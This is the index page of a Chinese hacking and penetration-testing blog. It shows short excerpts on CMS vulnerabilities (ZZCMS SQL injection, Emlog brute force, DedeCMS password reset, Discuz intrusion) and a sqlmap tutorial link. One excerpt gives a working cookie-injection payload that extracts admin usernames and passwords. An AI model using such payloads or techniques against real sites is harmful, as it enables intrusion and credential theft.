设置背景图片
模块透明度调整:

CMS漏洞之ZZCMS v8.2最新SQL注入漏洞

时间:2018-2-9   作者:H0rk4   浏览:160°  评论: 1 
时间:2018-2-9   分类: 渗透测试    热度:160   评论: 1
CMS漏洞之ZZCMS v8.2最新SQL注入漏洞 时间概述 近期在一直都在审核CMS漏洞,连续数日,一无所获,甚是无聊,略有些许焦躁。 暮然回首,桌角横幅,挚友所赠,书:《戒急用忍》,回想四爷当年之景,于今日此情此景,不甚寂寥。稍有感慨,正值审至ZZCMS V8.2,现SQL注入漏洞。大喜。 1.白盒审计 运用白盒审计工具,发现隐于暗处之SQL注入漏洞:/user/del.php  代码位置: /user/del.php 12行,获取参数。 由于存在c...

阅读全文>>

Emlog漏洞 | EMLOG博客系统存在暴力破解漏洞

时间:2018-2-7   作者:H0rk4   浏览:174°  评论: 2 
时间:2018-2-7   分类: 渗透测试    热度:174   评论: 2
漏洞简介: Emlog博客系统默认后台登陆地址为http://域名/admin/login.php 而后台登陆时,错误情况下,验证码未刷新,导致可暴力破解登陆管理员账号 低危漏洞,但是在emlog5.3.1和6.0测试版本均存在   漏洞成因: 同时,其6.0测试版本也未修复。   漏洞验证/演示: 下载官方的emlog5.3.1版本 http://www.emlog.net/ http://bbs.emlog.net/forum.php?mod=attachment&aid=MTk5MjF8OGI3O...

阅读全文>>

用 Python 代码自动抢火车票

时间:2018-1-23   作者:H0rk4   浏览:203°  评论: 0 
时间:2018-1-23   分类: 渗透测试    热度:203   评论: 0
市场上很多火车票抢票软件大家应该非常熟悉,但很少有人研究具体是怎么实现的,所以觉得很神秘,其实很简单。下面使用Python模拟抢票程序,给大家揭秘抢票到底是怎么回事。 该代码仅供参考,主要用于大家沟通交流,禁止用于商业用途。 具体代码如下,可以修改成自己的12306用户名账号: 1 准备工具 12306网站用户名和密码 Python chrome浏览器及下载chromedriver 下载Python代码,位于:https://github.com/ppy2790/tickets 代码用的Python+Splinter开发,Splinte...

阅读全文>>

DedeCMS最新版(20180109)任意用户密码修改

时间:2018-1-15   作者:H0rk4   浏览:206°  评论: 0 
时间:2018-1-15   分类: 渗透测试    热度:206   评论: 0
2018年01月09日,Dedecms官方更新了DedeCMS V5.7 SP2正式版,后续在10日有网友爆出其存在任意用户密码重置漏洞。 攻击难度:低。 危害程度:高。 官方修复情况如下: 目前暂未发布升级补丁 文章目录 什么是DedeCMS? 影响的版本 技术分析 漏洞验证 防护方案 什么是DedeCMS? 织梦内容管理系统(DeDeCMS) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,目前的版本无论在功能...

阅读全文>>

利用sqlmap进行sql注入

时间:2018-1-13   作者:H0rk4   浏览:280°  评论: 0 
时间:2018-1-13   分类: 渗透测试    热度:280   评论: 0
    >讲师名称:H0rk4(QQ76664864) 教程投稿人:狗币不愿意透露(QQ943161816) >动画名称:使用SqlMap进行Sql注入   教程下载地址:https://pan.baidu.com/s/1cZ0ZYA 密码:7ire

阅读全文>>

常用的主流WEB漏洞,EXP合集

时间:2018-1-2   作者:H0rk4   浏览:192°  评论: 1 
时间:2018-1-2   分类: 渗透测试    热度:192   评论: 1
  启航企业建站系统 cookie注入漏洞通杀所有版本 直接上exploit: javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")); test:http://www.8ohk.com/system/xitong/shownews.asp?id=210 -------------------------------------------------------...

阅读全文>>

挖掘某小型CMS厂商逻辑漏洞的过程

时间:2017-12-29   作者:H0rk4   浏览:150°  评论: 0 
时间:2017-12-29   分类: 渗透测试    热度:150   评论: 0
前景:在网易云学习的时候看到了某大型PHP网站的讲师,就浏览了一下网站,发现这是他们自己研究开发的一套CMS,就测试了一下是否某些用户交互的地方存在漏洞。   漏洞详情:   首先来到注册页面     先填写好信息,发送验证码到目标手机,验证码是4位数的,,所以直接输入1234抓包,forword包就可以注册成功了。 这里我测试:13888888888  发送到repeater,直接go就注册成功 ...

阅读全文>>

记一次对DZ的渗透

时间:2017-12-29   作者:H0rk4   浏览:350°  评论: 2 
时间:2017-12-29   分类: 渗透测试    热度:350   评论: 2
前言 0X01   某日某帅正在使用着啊 D 入侵百度的时候, 突然某位好友发来一条消息. "滴滴上车" 打开消息一看,说是要某帅帮忙日一个 Discuz 论坛,这一下,我晕了。毕竟 DZ那么 6 的程序,不好日啊。   然后那位某好友就发站过来,说是一个萝莉站, 禽兽不如,都是十岁以下的小孩? 某帅听到这句话就有点不高兴了。 尼玛再禽兽十岁孩子也不放过?   立马放弃用啊 D 入侵百度。   开端 0X02   打开网站。 ...

阅读全文>>



本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除  

Copyright © 2017-2019  H0rk4's Blog - 致力关注于黑客技术、渗透测试、网络信息安全、1980黑客团队   站长: H0rk4  主题1980黑客团队   H0rk4